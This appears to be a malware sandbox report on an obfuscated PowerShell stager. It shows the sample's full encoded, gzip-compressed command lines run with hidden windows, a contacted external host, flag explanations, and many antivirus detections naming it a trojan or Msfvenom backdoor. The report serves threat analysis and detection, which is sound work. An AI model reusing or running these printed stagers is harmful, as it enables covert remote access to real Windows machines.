cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASwBVADEAaQBtAGMAQwBBADcAVgBXAGIAVwArAGIAUwBCAEQAKwBYAHEAbgAvAEEAVgBWAEkAZwBPAHsAMQB9ADQAdgBVACcAJwArACcAJwBrAHsAMQB9AHEAZABLAEIAWAAzAEYATQBZAG8AZQBBAFkALwB1AHMAMAB3AFkAVwB2AFAASABDAHUAJwAnACsAJwAnAHIARABFAEwANwAzACsAOQB4AHMAdwB4AE8AawBsAHUAYwB1AGQAMQBKAFUAcwB3ACsAegBNADcATwB3AHoAegA4AHoAZwBKAGEASABEAEMAUQBzAEYAeAAvAHMAYwBDAGQAOAAvAGYAaABEAHkATgBVAEkAUgBDAGcAUgBaAGoARQBmAG0ARABwAFUARQBjAGQATgB7ADEAfQBqAHAAdABpADUASwArAEYAcgA0AEkAJwAnACsAJwAnADgAVgA5AGYAcgBOAGcAcwBRAEMAUgBjAFgARgA2ADAAawBpAG4ARABJAEQAKwAvAGwASAB1AFoAcQBIAE8AUABnAG4AaABJAGMAeQA0AHIAdwBwAHoAQgBaADQAZwBpAGYAWABOADgALwBZAEkAYwBMADMAdwBYAHgAagAzAEsAUABzAG4AdABFAGMANwBWAGQAQwB6AGwATABMAEoAeQBvAG8AWgB2AHUARABaAG0ARAAwAHMARAAnACcAKwAnACcASwA1AHAAbwBTAEwAawB1AC8ALwB5ADQAcAA4ADUAUABhAG8AdAB6ADUAbABpAEEAYQB5ADUASwA1AGkAegBrAE8AeQBpADYAbABrAGkATAA4AFUATgBJAEQAYgAzAGQAcgBMAEUAcwAnACcAKwAnACcARwBjAFMASQBXAE0ANAArAFgASgB5AFIAcwAxAE0AdABXACcAJwArACcAJwBHAEMAJwAnACsAJwAnAE0AUABYADQARwAzAFIAMgB4AGcAdgBtAFIAdQBMAE0ARgBkAGoAcgBlAEoATQBFACsAaQBNAEwAdABVADYAdQBXAGcASQAwAHYAdwBPAEkAcQBZAG8ANwBwAHUAaABPAE4AWQBLAGcAbgB6ADEAUAA5ADgAcwBmAGgATgBuAHUAZQBIADMAeQBRAGgASgB3AEUAdQA2AHkASABIAEUAVgB1AGIATwBIAG8AawBEAG8ANwBMAGYAUgBTADYARgBOADkAZwBiAHcARgBXAEoAbwA5AEkANgBDADgAVQBCAGQAUQBlADIAUQByAEwAWQBwAGgAUQBXAGgATAArAGkAeAB2ADUAQwBtADgASwA2AE4ANQByAEoARAA4ADMAQQBxADAAUgBqADUAUQBTAFoAUAB7ADEAfQBsAE4AUQAzAG0ASgBoAFEAZgBEAEsAVgBYADQAagB5AFEAUQBJAEYAMQBJAEEASwBnADkAeQBNAEYAMABDAHYASQB3AHgAdgBxAEsAOQB3ADUAQwBvAG8AMQB6ADMAWQB3AEIAQwB5AFAAVwBFAHcAeQAyADYAOQBDAHQAUwBRAFkAYwBEAGIAaQBMAE4AcgBCAHEAMwBnAGIASgBWAGgAWgBQAE0ARQB0AGkAUABTADAAOQBGADUAZgB0AGMASQBRAHoARABZAHgAQwBPAFkAMgBJACsANwBpAGEAUAA1AHsAMQB9ADUAawBXAGkATgA3AGEAcAAwAHQAcwA4AGIAbQBPACcAJwArACcAJwBQAGgATABpADkAQwAxAEYAQQBuAEkASwBxADgAbQB2ADUAdwBCADcARgBHAFIAegBsAFEAdQAwAEsANABwAE8AbABmAEEATwA3AGIAVQB5AHgAagAzAGcASwBjAFUAcQBMAEYAMgBhAGQAZwBQAEEAbgBXAHkAMABoADEATQBXAFIANgBrAEIATwBZADQAZwBLADAAcQAzADgASABNAHcAaABhADcASwBrAGgAdwBZAE8AQQBMAHIARABPAC8AQgBVADkASwBCAEEAYwBLAEcAZABGACcAJwArACcAJwA4AFcAdQBPAEQAMQA5AEIAeQBXAHAAUgBWAEUAYwBsADQAUgBSAEEAaABYAHEAbABBAFEAewAxAH0ASQA0AHIAZABrAHEAQwBHAE0AYwBtADMAMQBJAFMAegA3AEYARQA2AGgAbQBzAGsAbABCAE0ASAB4AGIAeAB3AHQAMQBEACsAQgBtAGQAKwBiAEkAdQBGAE0AWQA4AFMAQgA1AEkASwBFAE4AeQBhAGEAKwB3AFEAUgBGAE4ARQBTAGsASwBmAHUARgBqAGIAbQBjAFEAdgBqAHAAZAAnACcAKwAnACcAZQB4AGEATwBGAEsASQBYAEsAQQBVACsAUABrAEEAKwBRAHAARABpAFkAUABLAFYASwBCAEoARQBDAEwAWgBTAHkAaQBiAGsAZQByAEMAawBPAFEAQwBQAHIARgAxADIASwBmAE8AZwBPAGUAWABWAGsAegBFAEkAKwBkAHEAVQAzAHcAaQB5AHEANABFACcAJwArACcAJwBEADUARgBKAGMAQwBrAEcAZABCAFEAcgBKAE4AeQBuAGgASgBzAEUAbgBFAG8AZgB1AGsARwBHAC8AaQAvAHgASABCAHkANQA2AHsAMQB9AGgAZABLAEsAYwBKADQAWQB1AFMAaQB0AHUAYgBiAGoASwBmAG4ARgBBAEsAZgA4AHoATQBIAEoAbwBJAGcANAB3AE4AQwBOAFcASwBDAGgARwBKADgAMgBEACsAMQBGAC8AbABTADUASgBpADAAVgAxAGwAUQBQAHEAZQBGAG8ASwAxAEoAewAxAH0ATgA2AFMAbQBHAC8AQwB6AFMARQBOAG4ANwB7ADEAfQBQADMAYwAnACcAKwAnACcAdgBEAFEAcgAwAHsAMQB9AHQANwBkAEoAewAxAH0AOQBWAGcAMwArAHEAUAAyAHUATgA5AHYAUABnADUATQB1ADgAbgBOAGoAcwA0AHYAUgB6AG8AMwBPAG4AYwBQAEQANgBiAGEAdgA3AEcAbQBmAEsAYQByAC8AVgB0AFMAWABVADIAYgArAC8AVwBBADcATQAyAGgANgBrADYAMwBsAGQATwA5AHQAdAA5AFUAdABlADMAKwB3AFgAZQA5AGEAZAB2AHoALwBEAFAAUAB2AEsAbAA5ADcAcABMAGgAcABEAFgAVwBxAG4AVQAwAGIASABlAFMANAAnACcAKwAnACcAVQB7ADEAfQBiAGEATgBWAG0AMwBDAEcAYgAvAHAAaABZADQAOQBXAGcAeQArACsAbgBOAGsAVwBXAFYALwBIAHYAYQB1AGUASQBiAEkAZgBSAGcAMQAxAGoAeABsADUAWAAxAGQANgB5ADQAZQB3AEgAbgB0ADEAYgBHAHUANQB1ADIAcQArAGMAewAxAH0ANQBvAHIAdABhAE8AcQByAGIAQgBqAGQAegBWADIATwAnACcAKwAnACcAZABVAGkAZABWAFMAeAByAGEANAAyAHQAagByAGEAZQBBAHkAeQBVADcALwBpAE4AVQBGAEcANgAnACcAKwAnACcANgB5AEwAKwB1AHYAZAB4AHUASgBNADkAVgBVAHQAYQBZAFkAQgBXAG0AbwB7ADEAfQB1ADAANQBtADYANwB1AGIASgBmAGoAcQBRAGcAaABHAHAAZAByAFUAWABiAHgAbABYADQAWQB7ADEAfQBZAGoAOQBXAGIATgBTADcANABqAE8AMQBOAFcAagBXADMARAB0ADcAMwA2ACsAagA1AFcAQgBtAEoAOABQAHoAVwBlAHgAMgBCAHUAMgBOAHAAawA1AHIAbgBZAEgAVwA3AHEAbQBkAEcAOAB2AHEAegBpAGIAJwAnACsAJwAnADIAYQBqAGEANQBwAGIATwBKAFYAWgBzAHgANwBHAHcAcQBTAC8AQgBCAHMASABaAHQAcgArADQAcgBSAHMALwBYAGwAOQB1AGEARAAyAGUAZABaAGYANABEAEUAdABEADcAdQBsACcAJwArACcAJwBzADUAdAA3ADUAbwA0AGUAYgBTAEgAegAzADYANwBuAGgAeQBkAHIATwA5ADIAJwAnACsAJwAnAHQAMwBYAG0AVwBwAFYASwB2AFkAbgBTAFAAWABjAEkAaQBGAHYAMQBCAGMAaQBZAG0AawBmAC8AUABoAEIAMwBFAEEAUABmADUAYgB3AHQANQBxADgAZwBhAEoANABpAFMAZwBRAEEAZABwADMAVQBZAHAAZABGAG4AWAB6AGoAagB4AGkASgBMAFcAUQA1AFcAeQBzAHIAMwBBAFUAWQBnAHEAagBFAEkAWgBsAHcAVwBHAFYAVQB1AGEAawA4AHkARAB0ADMAewAxAH0AQwBLAEQAZwBNAGkAbgBWAGUAVwBuAHMAWAAwADIAcABNAGkAUABDAGsAcQB4AHoAbABSAGkAQwA0AHUAWgBoAEEAawBsAEEAVQBFAFAATQBTAGgAegA1AGUAbAA2AHIAWgBSAHIAVQBKAC8AcgAyADYAcgB6AFkAegAvADcANwA5AFkAaQA2ADEAJwAnACsAJwAnADMAcwBwAGcAVwBVAEQAVQB0AE4AOQBnADkAZQBLAGEAWgBaADMAQgBHAFAARQBHAFcAZgB6ADEAUQA4AEEAMwBBAG8AUwBHADkAQwBkAFYAYgBxAE0ASABSAEsAMgBnAGcAMABNADgATwBoAFoAMQBpAHAAegBGAEcAbgB5AE8AWABYACsAdQBKAEIAawBmAGcAQQBMAEUAYQAzAEgAdQBlAEQAbgA5AGcAQgAxAGkAZgA0AEcAKwBDAHkATgBQAFIAKwBIAHoAVQBpAGoASABWADEARgA5AEwAbQBMAHcANwBMAGUASABQAC8AUgBmAEMASABHAFgALwBzAFAAcwB1AEUAbABWAEwAQgAyAHgAZQBpAEgAOABXAFAATwB2AHEAdgB4AEMAQgBDAFMASQBjAE4ARQAzAG8AcwB4AFEAZgBwAHYANgByAFEATwBSAEYAOABpAHkALwBhAFgAYQBnAEMATAB4ADgAcABaAC8AQgAxAHcAawAvAHUAWQBJAFAAcQA2AHoAUgAvAHcAWABqADkAawBmAG8AZgB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBUACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA |
cmdline | "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAKU1imcCA7VWbW+bSBD+Xqn/AVVIgO{1}4vU'+'k{1}qdKBX3FMYoeAY/us0wYWvPHCu'+'rDEL73+9xswxOklucud1JUsw+zM7Owzz8zgJaHDCQsFx/scCd8/fhDyNUIRCgRZjEfmDpUEcdN{1}jpti5K+Fr4I'+'8V9frNgsQCRcXF60kinDID+/lHuZqHOPgnhIcy4rwpzBZ4gifXN8/YIcL3wXxj3KPsntEc7VdCzlLLJyooZvuDZmD0sD'+'K5poSLku//y4p85Paotz5liAay5K5izkOyi6lkiL8UNIDb3drLEs'+'GcSIWM4+XJyRs1MtW'+'GC'+'MPX4G3R2xgvmRuLMFdjreJME+iMLtU6uWgI0vwOIqYo7puhONYKgnz1P98sfhNnueH3yQhJwEu6yHHEVubOHokDo7LfRS6FN9gbwFWJo9I6C8UBdQe2QrLYphQWhL+ixv5Cm8K6N5rJD83Aq0Rj5QSZP{1}lNQ3mJhQfDKVX4jyQQIF1IAKg9yMF0CvIwxvqK9w5Coo1z3YwBCyPWEwy269CtSQYcDbiLNrBq3gbJVhZPMEtiPS09F5ftcIQzDYxCOY2I+7iaP5{1}5kWiN7ap0ts8bmO'+'PhLi9C1FAnIKq8mv5wB7FGRzlQu0K4pOlfAO7bUyxj3gKcUqLF2adgPAnWy0h1MWR6kBOY4gK0q38HMwha7KkhwYOALrDO/BU9KBAcKGdF'+'8WuOD19ByWpRVEcl4RRAhXqlAQ{1}I4rdkqCGMcm31ISz7FE6hmsklBMHxbxwt1D+Bmd+bIuFMY8SB5IKENyaa+wQRFNESkKfuFjbmcQvjpd'+'exaOFKIXKAU+PkA+QpDiYPKVKBJECLZSyibkerCkOQCPrF12KfOgOeXVkzEI+dqU3wiyq4E'+'D5FJcCkGdBQrJNynhJsEnEofukGG/i/xHBy56{1}hdKKcJ4YuSitubbjKfnFAKf8zMHJoIg4wNCNWKChGJ82D+1F/lS5Ji0V1lQPqeFoK1J{1}N6SmG/CzSENn7{1}P3c'+'vDQr0{1}t7dJ{1}9Vg3+qP2uN9vPg5Mu8nNjs4vRzo3OncPD6bav7GmfKar/VtSXU2b+/WA7M2h6k63ldO9tt9Ute3+wXe9advz/DPPvKl97pLhpDXWqnU0bHeS4'+'U{1}baNVm3CGb/phY49Wgy++nNkWWV/HvaueIbIfRg11jxl5X1d6y4ewHnt1bGu5u2q+c{1}5ortaOqrbBjdzV2O'+'dUidVSxra42tjraeAyyU7/iNUFG6'+'6yL+uvdxuJM9VUtaYYBWmo{1}u05m67ubJfjqQghGpdrUXbxlX4Y{1}Yj9WbNS74jO1NWjW3Dt736+j5WBmJ8PzWex2Bu2Npk5rnYHW7qmdG8vqzib'+'2aja5pbOJVZsx7GwqS/BBsHZtr+4rRs/Xl9uaD2edZf4DEtD7ul'+'s5t75o4ebSHz367nhydrO92'+'t3XmWpVKvYnSPXcIiFv1BciYmkf/PhB3EAPf5bwt5q8gaJ4iSgQAdp3UYpdFnXzjjxiJLWQ5Wysr3AUYgqjEIZlwWGVUuak8yDt3{1}CKDgMinVeWnsX02pMiPCkqxzlRiC4uZhAklAUEPMShz5el6rZRrUJ/r26rzYz/779Yi61'+'3spgWUDUtN9g9eKaZZ3BGPEGWfz1Q8A3AoSG9CdVbqMHRK2gg0M8OhZ1ipzFGnyOXX+uJBkfgALEa3HueDn9gB1if4G+CyNPR+HzUijHV1F9LmLw7LeHP/RfCHGX/sPsuElVLB2xeiH8WPOvqvxCBCSIcNE3osxQfpv6rQORF8iy/aXagCLx8pZ/B1wk/uYIPq6zR/wXj9kfofwsAAA{0}{0}')-f'=','T')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) |
host | 122.114.193.75 |
parent_process | powershell.exe | martian_process | "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAKU1imcCA7VWbW+bSBD+Xqn/AVVIgO{1}4vU'+'k{1}qdKBX3FMYoeAY/us0wYWvPHCu'+'rDEL73+9xswxOklucud1JUsw+zM7Owzz8zgJaHDCQsFx/scCd8/fhDyNUIRCgRZjEfmDpUEcdN{1}jpti5K+Fr4I'+'8V9frNgsQCRcXF60kinDID+/lHuZqHOPgnhIcy4rwpzBZ4gifXN8/YIcL3wXxj3KPsntEc7VdCzlLLJyooZvuDZmD0sD'+'K5poSLku//y4p85Paotz5liAay5K5izkOyi6lkiL8UNIDb3drLEs'+'GcSIWM4+XJyRs1MtW'+'GC'+'MPX4G3R2xgvmRuLMFdjreJME+iMLtU6uWgI0vwOIqYo7puhONYKgnz1P98sfhNnueH3yQhJwEu6yHHEVubOHokDo7LfRS6FN9gbwFWJo9I6C8UBdQe2QrLYphQWhL+ixv5Cm8K6N5rJD83Aq0Rj5QSZP{1}lNQ3mJhQfDKVX4jyQQIF1IAKg9yMF0CvIwxvqK9w5Coo1z3YwBCyPWEwy269CtSQYcDbiLNrBq3gbJVhZPMEtiPS09F5ftcIQzDYxCOY2I+7iaP5{1}5kWiN7ap0ts8bmO'+'PhLi9C1FAnIKq8mv5wB7FGRzlQu0K4pOlfAO7bUyxj3gKcUqLF2adgPAnWy0h1MWR6kBOY4gK0q38HMwha7KkhwYOALrDO/BU9KBAcKGdF'+'8WuOD19ByWpRVEcl4RRAhXqlAQ{1}I4rdkqCGMcm31ISz7FE6hmsklBMHxbxwt1D+Bmd+bIuFMY8SB5IKENyaa+wQRFNESkKfuFjbmcQvjpd'+'exaOFKIXKAU+PkA+QpDiYPKVKBJECLZSyibkerCkOQCPrF12KfOgOeXVkzEI+dqU3wiyq4E'+'D5FJcCkGdBQrJNynhJsEnEofukGG/i/xHBy56{1}hdKKcJ4YuSitubbjKfnFAKf8zMHJoIg4wNCNWKChGJ82D+1F/lS5Ji0V1lQPqeFoK1J{1}N6SmG/CzSENn7{1}P3c'+'vDQr0{1}t7dJ{1}9Vg3+qP2uN9vPg5Mu8nNjs4vRzo3OncPD6bav7GmfKar/VtSXU2b+/WA7M2h6k63ldO9tt9Ute3+wXe9advz/DPPvKl97pLhpDXWqnU0bHeS4'+'U{1}baNVm3CGb/phY49Wgy++nNkWWV/HvaueIbIfRg11jxl5X1d6y4ewHnt1bGu5u2q+c{1}5ortaOqrbBjdzV2O'+'dUidVSxra42tjraeAyyU7/iNUFG6'+'6yL+uvdxuJM9VUtaYYBWmo{1}u05m67ubJfjqQghGpdrUXbxlX4Y{1}Yj9WbNS74jO1NWjW3Dt736+j5WBmJ8PzWex2Bu2Npk5rnYHW7qmdG8vqzib'+'2aja5pbOJVZsx7GwqS/BBsHZtr+4rRs/Xl9uaD2edZf4DEtD7ul'+'s5t75o4ebSHz367nhydrO92'+'t3XmWpVKvYnSPXcIiFv1BciYmkf/PhB3EAPf5bwt5q8gaJ4iSgQAdp3UYpdFnXzjjxiJLWQ5Wysr3AUYgqjEIZlwWGVUuak8yDt3{1}CKDgMinVeWnsX02pMiPCkqxzlRiC4uZhAklAUEPMShz5el6rZRrUJ/r26rzYz/779Yi61'+'3spgWUDUtN9g9eKaZZ3BGPEGWfz1Q8A3AoSG9CdVbqMHRK2gg0M8OhZ1ipzFGnyOXX+uJBkfgALEa3HueDn9gB1if4G+CyNPR+HzUijHV1F9LmLw7LeHP/RfCHGX/sPsuElVLB2xeiH8WPOvqvxCBCSIcNE3osxQfpv6rQORF8iy/aXagCLx8pZ/B1wk/uYIPq6zR/wXj9kfofwsAAA{0}{0}')-f'=','T')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) |
option | -nop | value | Does not load current user profile | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -nop | value | Does not load current user profile | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -nop | value | Does not load current user profile | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window |
ClamAV | Vbs.Backdoor.Msfvenom_Payload-9951533-0 |
CTX | powershell.trojan.generic |
CAT-QuickHeal | Script.Trojan.42447 |
Skyhigh | BehavesLike.HTML.Dropper.zr |
ALYac | Trojan.Script.905440 |
VIPRE | Trojan.Script.905440 |
Sangfor | Trojan.Generic-Script.Save.4c97a2d4 |
Arcabit | Trojan.Script.DDD0E0 |
Baidu | VBS.Trojan-Downloader.Agent.va |
Symantec | VBS.Heur.SNIC |
ESET-NOD32 | VBS/Agent.NUI |
Avast | VBS:Obfuscated-GQ [Cryp] |
Cynet | Malicious (score: 99) |
Kaspersky | HEUR:Trojan.VBS.Agent.gen |
BitDefender | Trojan.Script.905440 |
NANO-Antivirus | Trojan.Html.Downloader.fqlyhy |
MicroWorld-eScan | Trojan.Script.905440 |
Rising | Dropper.Ploty!8.EEC8 (TOPIS:E0:Q0eCX8vJheP) |
Emsisoft | Trojan.Script.905440 (B) |
F-Secure | Backdoor:HTML/PowerShellStager.A |
Sophos | Mal/PSDL-B |
Ikarus | Trojan.PowerShell.Agent |
FireEye | Trojan.Script.905440 |
Detected | |
Avira | VBS/PSRunner.VPA |
Kingsoft | Win32.Infected.AutoInfector.a |
Xcitium | TrojWare.VBS.Agent.NUI@8a4oj4 |
Microsoft | TrojanDropper:VBS/PSRunner.G!MSR |
GData | Trojan.Script.905440 |
Varist | VBS/Agent.AXB!Eldorado |
McAfee | PS/Injector.d |
Tencent | Heur:Trojan.Powershell.Generic.d |
huorong | Trojan/HTML.Agent.a |
Fortinet | VBS/Inject.B!tr |
AVG | VBS:Obfuscated-GQ [Cryp] |
dead_host | 122.114.193.75:443 |
dead_host | 192.168.56.103:49166 |